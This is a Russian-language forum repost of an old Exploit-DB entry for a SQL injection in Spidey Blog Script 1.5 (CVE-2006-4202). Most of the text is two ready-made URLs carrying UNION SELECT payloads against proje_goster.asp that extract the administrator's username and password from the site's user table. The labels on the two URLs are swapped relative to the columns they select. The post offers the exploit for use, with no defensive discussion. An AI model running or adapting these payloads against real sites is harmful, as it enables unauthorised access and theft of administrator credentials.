Exploit Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (1)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2186
Проверка EDB
  1. Пройдено
Автор
ASIANEAGLE
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2006-4202
Дата публикации
2006-08-14
Код:
###############################################################
#Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability  #
#Author : ASIANEAGLE                                          #
#Site   : www.asianeagle.org                                  #
#Contact: [email protected]                                #
###############################################################
#Risk   : High
#Download Link Of Spidey Blog : http://www.aspindir.com/Kategoriler/ASP/bloglar


#Exploit;
#Admin Nick;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201

#Admin Password;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201


#Greetz: Str0ke
Forever milw0rm ;)

# milw0rm.com [2006-08-14]
 
Источник
www.exploit-db.com

Похожие темы